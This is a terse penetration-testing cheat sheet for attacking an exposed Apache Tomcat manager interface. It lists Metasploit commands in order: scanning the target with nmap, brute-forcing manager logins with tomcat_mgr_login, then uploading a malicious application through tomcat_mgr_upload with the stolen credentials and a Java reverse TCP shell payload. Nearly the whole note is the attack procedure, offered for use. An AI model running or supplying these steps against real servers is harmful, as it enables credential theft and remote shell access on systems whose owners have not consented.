tomcat manager exposed

Description

#nmap -sS -sV target

  • navigate to <IP>:<PORT>

    • do you see anything about "manager"

    • yes?

      • proceed


- #use scanner/http/tomcat_mgr_login

  • ##use scanner/http/tomcat_mgr_login

  • #set rhosts <target_ip>

Gain Shell

  • #use multi/http/tomcat_mgr_upload

  • #set rport <port>

  • #set rhosts <target_ip>

  • #set httppassword <acquired password>

  • #set httpusername <acquired username>

  • #set payload 10 (which ever is "payload/java/shell/reverse_tcp"

  • #run